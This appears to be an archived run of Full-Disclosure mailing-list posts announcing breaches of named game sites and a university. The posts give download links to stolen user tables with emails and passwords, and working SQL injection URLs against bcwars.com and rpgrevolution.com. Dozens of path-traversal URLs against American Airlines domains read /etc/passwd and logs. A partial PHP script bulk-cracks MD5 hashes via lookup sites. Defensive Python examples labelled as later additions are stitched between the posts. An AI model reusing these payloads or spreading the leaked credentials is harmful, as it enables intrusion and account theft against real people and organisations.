[Full-disclosure] bcwars.com & pokerrpg.com hacked 200k Email and Plain text passwords

2011-03-30 Thread Bob Smith
Nother game, nother haxed db

2 games
pokerrpg.com
and
bcwars.com

over 100k users each

admin used plaintext passwords

how dumb

got in thru sql injection in the forum

tried helping the admin fix but dumbass Dadfish kept being a dick so
this disclosure is because of him

bcwars
http://bit.ly/hD6bEE
http://rapidshare.com/files/455184098/tblUsers-bc.sql.zip
http://www.megaupload.com/?d=P4B30IVR
http://depositfiles.com/de/files/u7unbc4vk
http://hotfile.com/dl/112676282/bcd44f5/tblUsers-bc.sql.zip.html
http://www.zshare.net/download/884416713e3e2044/
http://uploading.com/files/3e13f3be/tblUsers-bc.sql.zip/

pokerrpg
http://bit.ly/hgCGJx
http://rapidshare.com/files/455184096/tblUsers.sql-poker.zip
http://www.megaupload.com/?d=T41NF4SV
http://depositfiles.com/de/files/8qgnt9gll
http://hotfile.com/dl/112676281/bea47ec/tblUsers.sql-poker.zip.html
http://www.zshare.net/download/88441668eff79c3a/
http://uploading.com/files/542e651f/tblUsers.sql-poker.zip

injection was
http://bcwars.com/forum/category/-3' union select concat(id,'',username,':::',password,':::',email) from tblUsers-- -

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Washington University Student and Staff Dump

2011-08-01 Thread Bob Smith
Came across this: http://www.washington.edu/home/peopledir/

I dumped most emails here

http://pastebin.com/ALYtW4hA



[Full-disclosure] MD5 "decrypter" PHP Script

2010-11-28 Thread Bob Smith
I use the word "decrypter" loosely, but it is what the site's
advertising it to be.

So I wrote a PHP script that takes hashes from a database
(columns are as such: id, hash, unhashed)
and checks them against md5-decrypter.com and md5decryption.com

these sites have no captcha protection (and over 4.7mil stored hashes)

                  "http://md5-encryption.com/", "data[Row][clear]",
                  $plaintext);
    }

    if($num != 2){
        give_back("http://md5encryption.com/",
                  "submit=Encrypt%20It!&word",
                  $plaintext);
    }
}

// POST one hash to a lookup site and cut the plaintext out of the HTML reply.
function fetch_md5($url, $post, $start, $end, $trim, $hash){
    $posted_vars = $post . "=" . $hash;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_REFERER, $url);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $posted_vars);
    $fetched_page = curl_exec($ch);
    curl_close($ch);
    unset($ch);

    $password = get_string_between($fetched_page, $start, $end);

    // some sites prefix the result with a fixed label; $trim skips that many chars
    if(isset($trim) && !empty($trim)){
        $password = substr($password, $trim);
    }

    return $password;
}

// Write the recovered plaintext back next to its hash. The value comes from a
// third-party page, so it is escaped instead of being spliced into the SQL raw.
function update_plaintext($table_name, $id_field, $row_id, $plaintext,
                          $dehashed){ // table name, table id field, row id value,
                                      // the table plaintext field, the dehashed password
    $sql = "update $table_name set $plaintext = '" .
           mysql_real_escape_string($dehashed) . "' where " .
           "$id_field = '" . mysql_real_escape_string($row_id) . "'";
    mysql_query($sql);
}

while($row = mysql_fetch_array($result)){

    $password1 = fetch_md5("http://md5-decrypter.com/",
                           "data[Row][cripted]", "Decrypted text:", "", "21",
                           $row[$table_hash]);

    if(!empty($password1)){
        update_plaintext($db_table, $table_id_field,
                         $row[$table_id_field],
                         $table_plaintext, $password1);
        if($giveback == "1"){
            do_except("1", $password1);
        }
        continue;
    }

    $password2 = fetch_md5("http://md5decryption.com/",
                           "submit=Decrypt%20It!&hash", "Decrypted Text: ", "",
                           "", $row[$table_hash]);

    if(!empty($password2)){
        update_plaintext($db_table, $table_id_field,
                         $row[$table_id_field],
                         $table_plaintext, $password2);
        if($giveback == "1"){
            do_except("2", $password2);
        }
        continue;
    }

}
?>
http://pastebin.com/idGqmqAg



[Full-disclosure] Scrollwars.com & HellRising.com Hacked

2010-12-21 Thread Bob Smith
Hacked Sites owned by same user.

Scrollwars.com users table

http://bit.ly/eAgzbC
mirror:http://bit.ly/i7pI99

--
Hellrising.com users table
part 1: http://bit.ly/dHTOIR
part 2: http://bit.ly/eFLLLe
part 3: http://bit.ly/ibrspH

First site used md5 second site used sha1, ID1 used a weak password
just google his sha1 pass to find the real value

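An added example (mine, not code from either the MD5 "decrypter" post or the Scrollwars/HellRising post) showing why bare md5/sha1 hashes can be reversed by a web lookup or a Google search, and what a per-user salt plus a slow KDF changes. The lookup table, the sample users and the weak password are constructed for the illustration.

```python
import hashlib
import hmac
import os
from typing import Optional

WEAK = "password"  # constructed weak password shared by two sample users
# Stand-in for a public lookup site: a precomputed digest -> plaintext table.
# Unsalted md5/sha1 are deterministic, so one such table serves every site.
LOOKUP = {hashlib.md5(WEAK.encode()).hexdigest(): WEAK,
          hashlib.sha1(WEAK.encode()).hexdigest(): WEAK}

def unsalted(pw: str, algo: str = "sha1") -> str:
    """What the two sites stored: a bare md5 or sha1 of the password."""
    return hashlib.new(algo, pw.encode()).hexdigest()

def lookup(hexdigest: str) -> Optional[str]:
    """What the 'decrypter' sites actually do: a dictionary lookup, no math."""
    return LOOKUP.get(hexdigest.lower())

def hash_password(pw: str, salt: Optional[bytes] = None) -> tuple:
    """Per-user random salt plus a slow KDF (PBKDF2-HMAC-SHA256 here):
    the same password yields a different digest for every user."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 200_000)

def verify_password(pw: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 200_000)
    return hmac.compare_digest(candidate, digest)

def demo() -> dict:
    """Two sample users with the same weak password, stored both ways."""
    a_md5, b_md5 = unsalted(WEAK, "md5"), unsalted(WEAK, "md5")
    salt_a, dig_a = hash_password(WEAK)
    salt_b, dig_b = hash_password(WEAK)
    return {
        "unsalted_identical": a_md5 == b_md5,        # one lookup cracks both
        "unsalted_reversed": lookup(a_md5) == WEAK,  # the sites' whole trick
        "salted_identical": dig_a == dig_b,          # False: a table is useless
        "salted_verifies": verify_password(WEAK, salt_a, dig_a),
        "salted_rejects_wrong": verify_password("passw0rd", salt_b, dig_b),
    }
```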


[Full-disclosure] rpgrevolution.com SQL Injection

2011-01-13 Thread Bob Smith
/home/rpgrev/domains/rpgrevolution.com/public_html/

http://www.rpgrevolution.com/games.php?platform=all&genre=aaa' union select 1,user(),group_concat(converge_id),group_concat(converge_pass_salt),5,6,group_concat(converge_pass_hash),8,9,10,11,12,13,14,15 from ibf_members_converge-- -&list=desc&limiter=10&order=id

Salted


Corresponding Salt



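An added defender's example (mine, not code from the bcwars or rpgrevolution posts): the category lookup behind the union injection in those two posts, rebuilt on an in-memory SQLite database with the string-spliced query beside a parameterised one. The schema, rows and function names are constructed for the illustration, and MySQL's concat() is rewritten with SQLite's || operator so the same input runs here.

```python
import sqlite3
from typing import Optional

def build_db() -> sqlite3.Connection:
    """Constructed toy schema: a forum category looked up by id, plus the
    users table that the UNION in the post pulled rows from."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE category (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE tblUsers (id INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO category VALUES (1, 'General'), (2, 'Trading');
        INSERT INTO tblUsers VALUES (1, 'alice', 'hunter2', 'alice@example.invalid');
    """)
    return db

# The post's category parameter, with concat() written as SQLite's ||.
PAYLOAD = ("-3' union select id||':::'||username||':::'||password||':::'||email "
           "from tblUsers-- -")

def vulnerable_category_names(db: sqlite3.Connection, category_id: str) -> list:
    """The 'before': the request parameter is spliced into the SQL text, so a
    quote in it closes the literal and the remainder is parsed as SQL."""
    sql = f"SELECT name FROM category WHERE id = '{category_id}'"
    return [row[0] for row in db.execute(sql)]

def safe_category_names(db: sqlite3.Connection, category_id: str) -> list:
    """The 'after': the value is bound as a parameter. The SQL text is fixed,
    so the same input is compared as one literal string and matches nothing."""
    rows = db.execute("SELECT name FROM category WHERE id = ?", (category_id,))
    return [row[0] for row in rows]

def parse_category_id(raw: str) -> Optional[int]:
    """Second layer: the parameter is an integer id, so anything that is not
    one is rejected before it reaches the database at all."""
    body = raw[1:] if raw.startswith("-") else raw
    return int(raw) if body.isdigit() else None
```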

[Full-disclosure] jaillords.com hacked, login/password/email list

2011-02-07 Thread Bob Smith
Weak passwords, no brute force protection, lots of sql injections,
was easy to take full control of site

Here's the password files
http://bit.ly/fpiJAe
http://www.multiupload.com/RS_FFZYI7E55X
http://www.multiupload.com/MU_FFZYI7E55X
http://www.multiupload.com/DF_FFZYI7E55X
http://www.multiupload.com/HF_FFZYI7E55X
http://www.multiupload.com/ZS_FFZYI7E55X
http://www.multiupload.com/UP_FFZYI7E55X
http://www.megaupload.com/?d=J4ILN922
http://depositfiles.com/de/files/t7bo8r83f
http://hotfile.com/dl/102762685/72d8295/dump_07-02-2011-12-36-26.sql.html
http://www.zshare.net/download/862671854c06f092/
http://uploading.com/files/c1a234f8/dump_07-02-2011-12-36-26.sql/
http://rapidshare.com/files/446763555/dump_07-02-2011-12-36-26.sql


admins fix ur shit or we will be back



[Full-disclosure] American Airlines (multiple domains) Local File Include

2009-07-16 Thread Bob Smith
American Airlines' domains have been vulnerable to Local file Include
(I wonder if anyone has flown free using this)

http://www.aa.com.do/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.aa.com.pe/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.be/aa/i18nForward.do?locale=en_GB&p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ch/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cn/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.cr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.uk/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.de/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.fr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ie/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.in/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.it/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.jp/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.american-airlines.nl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com.ve/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.au/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.ru/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.flagshiplounge.net/aa/i18nForward.do?locale=en_GB&p=
http://www.premiumcustomerservices.net/aa/i18nForward.do?locale=en_GB&p=
http://www.touraa.com/aa/i18nForward.do?p=
and some sensitive files I found
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/wtmpx
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/logadm.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/messages
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/lib/newsyslog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/sbin/logadm
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/lastlog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/netconfig
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/syslog.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/system
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/hosts

screenshots
http://i41.tinypic.com/fcns7t.jpg
http://i25.tinypic.com/359z85z.jpg

it's been reported and they don't feel like responding
(if the page doesn't work try taking off a ../)

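An added example (mine, not code from the post or from the site described) of the check the i18nForward.do?p= parameter above was missing: resolve the requested page under the page root and refuse anything that lands outside it, however many ../ segments the request carries. The directory tree, file names and function names are constructed for the illustration.

```python
import tempfile
from pathlib import Path

class PathEscapesBase(ValueError):
    """Raised when a forward target would resolve outside the page root."""

def resolve_forward_target(base_dir: str, p: str) -> Path:
    """Resolve a user-supplied page name (the role 'p' plays above) under
    base_dir and refuse anything that leaves it."""
    base = Path(base_dir).resolve()
    if not p or "\x00" in p or Path(p).is_absolute():
        raise PathEscapesBase(f"rejected raw value {p!r}")
    # Joining then resolving collapses every '..' (and follows symlinks);
    # the containment test runs on that resolved path, not on the raw string,
    # so the exact number of '../' segments in the request is irrelevant.
    candidate = (base / p).resolve()
    if candidate != base and base not in candidate.parents:
        raise PathEscapesBase(f"{p!r} resolves to {candidate}, outside {base}")
    return candidate

def is_allowed(base_dir: str, p: str) -> bool:
    try:
        resolve_forward_target(base_dir, p)
        return True
    except PathEscapesBase:
        return False

def demo() -> dict:
    """Constructed tree: a page root two levels below a fake etc/passwd."""
    root = Path(tempfile.mkdtemp())
    base = root / "webapp" / "pages"
    (base / "en_GB").mkdir(parents=True)
    (base / "en_GB" / "home.html").write_text("ok")
    (root / "etc").mkdir()
    (root / "etc" / "passwd").write_text("constructed, not a real passwd file")
    b = str(base)
    return {
        "legit_page": is_allowed(b, "en_GB/home.html"),
        "inner_dots_ok": is_allowed(b, "en_GB/../en_GB/home.html"),
        "exact_depth": is_allowed(b, "../../etc/passwd"),
        "too_many_dots": is_allowed(b, "../" * 25 + "etc/passwd"),
        "one_dot_short": is_allowed(b, "../etc/passwd"),
        "absolute": is_allowed(b, "/etc/passwd"),
    }
```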